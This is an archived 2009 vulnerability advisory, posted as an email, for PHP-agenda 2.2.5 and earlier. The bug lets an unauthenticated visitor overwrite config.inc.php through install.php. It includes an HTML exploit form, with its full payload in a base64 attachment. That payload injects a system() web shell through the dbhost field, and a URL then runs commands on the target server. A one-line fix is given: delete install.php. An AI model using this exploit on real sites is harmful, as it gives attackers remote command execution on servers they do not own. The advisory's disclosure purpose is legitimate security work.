AOH :: HP Unsorted P :: VA3127.HTM

PHP-agenda <= 2.2.5 Remote File Overwriting



PHP-agenda <= 2.2.5 Remote File Overwriting
PHP-agenda <= 2.2.5 Remote File Overwriting



--0016368e2bc90370450467333c5c
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 7bit

*******   Salvatore "drosophila" Fresta   *******

[+] Application: PHP-agenda
[+] Version: <= 2.2.5
[+] Website: http://php-agenda.sourceforge.net 

[+] Bugs: [A] Remote File Overwriting

[+] Exploitation: Remote
[+] Date: 10 Apr 2009

[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@gmail.com 


*************************************************

[+] Menu

1) Bugs
2) Code
3) Fix


*************************************************

[+] Bugs


- [A] Remote File Overwriting

[-] Risk: hight
[-] File affected: install.php

This bug allows a guest to overwrite config.inc.php
inserting PHP code.


*************************************************

[+] Code


- [A] Remote File Overwriting


  PHP-agenda <= 2.2.5 - Remote File Overwriting
  
action="http://www.site.com/path/install.php" method="post">
To execute commands: http://www.site.com/path/config.inc.php?cmd=uname -a ************************************************* [+] Fix You must delete install.php after installation. ************************************************* -- Salvatore "drosophila" Fresta CWNP444351 --0016368e2bc90370450467333c5c Content-Type: text/plain; charset=US-ASCII; name="PHP-agenda <= 2.2.5 Remote File Overwriting-10042009.txt" Content-Disposition: attachment; filename="PHP-agenda <= 2.2.5 Remote File Overwriting-10042009.txt" Content-Transfer-Encoding: base64 X-Attachment-Id: f_ftcwngkm0 KioqKioqKiAgIFNhbHZhdG9yZSAiZHJvc29waGlsYSIgRnJlc3RhICAgKioqKioqKgoKWytdIEFw cGxpY2F0aW9uOiBQSFAtYWdlbmRhClsrXSBWZXJzaW9uOiA8PSAyLjIuNQpbK10gV2Vic2l0ZTog aHR0cDovL3BocC1hZ2VuZGEuc291cmNlZm9yZ2UubmV0CgpbK10gQnVnczogW0FdIFJlbW90ZSBG aWxlIE92ZXJ3cml0aW5nCgpbK10gRXhwbG9pdGF0aW9uOiBSZW1vdGUKWytdIERhdGU6IDEwIEFw ciAyMDA5CgpbK10gRGlzY292ZXJlZCBieTogU2FsdmF0b3JlICJkcm9zb3BoaWxhIiBGcmVzdGEK WytdIEF1dGhvcjogU2FsdmF0b3JlICJkcm9zb3BoaWxhIiBGcmVzdGEKWytdIENvbnRhY3Q6IGUt bWFpbDogZHJvc29waGlsYXh4eEBnbWFpbC5jb20KCgoqKioqKioqKioqKioqKioqKioqKioqKioq KioqKioqKioqKioqKioqKioqKioqKioqCgpbK10gTWVudQoKMSkgQnVncwoyKSBDb2RlCjMpIEZp eAoKCioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioKClsr XSBCdWdzCgoKLSBbQV0gUmVtb3RlIEZpbGUgT3ZlcndyaXRpbmcKClstXSBSaXNrOiBoaWdodApb LV0gRmlsZSBhZmZlY3RlZDogaW5zdGFsbC5waHAKClRoaXMgYnVnIGFsbG93cyBhIGd1ZXN0IHRv IG92ZXJ3cml0ZSBjb25maWcuaW5jLnBocAppbnNlcnRpbmcgUEhQIGNvZGUuCgoKKioqKioqKioq KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKgoKWytdIENvZGUKCgotIFtB XSBSZW1vdGUgRmlsZSBPdmVyd3JpdGluZwoKPGh0bWw+CiAgPGhlYWQ+UEhQLWFnZW5kYSA8PSAy LjIuNSAtIFJlbW90ZSBGaWxlIE92ZXJ3cml0aW5nPC9oZWFkPgogIDxib2R5PgogICAgPGZvcm0g YWN0aW9uPSJodHRwOi8vd3d3LnNpdGUuY29tL3BhdGgvaW5zdGFsbC5waHAiIG1ldGhvZD0icG9z dCI+CiAgICAgIDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJkYmhvc3QiIHNpemU9IjMwIiB2YWx1 ZT0iJzsgc3lzdGVtKCRfR0VUWydjbWQnXSk7IGVjaG8gJyI+CiAgICAgIDxpbnB1dCB0eXBlPSJz dWJtaXQiIHZhbHVlPSJFeHBsb2l0ISIgPgogICAgPC9mb3JtPgogIDwvYm9keT4KPC9oZWFkPgoK VG8gZXhlY3V0ZSBjb21tYW5kczoKCmh0dHA6Ly93d3cuc2l0ZS5jb20vcGF0aC9jb25maWcuaW5j LnBocD9jbWQ9dW5hbWUgLWEKCgoqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq KioqKioqKioqKioqCgpbK10gRml4CgpZb3UgbXVzdCBkZWxldGUgaW5zdGFsbC5waHAgYWZ0ZXIg aW5zdGFsbGF0aW9uLgoKCioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq KioqKioqKio--0016368e2bc90370450467333c5c--

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.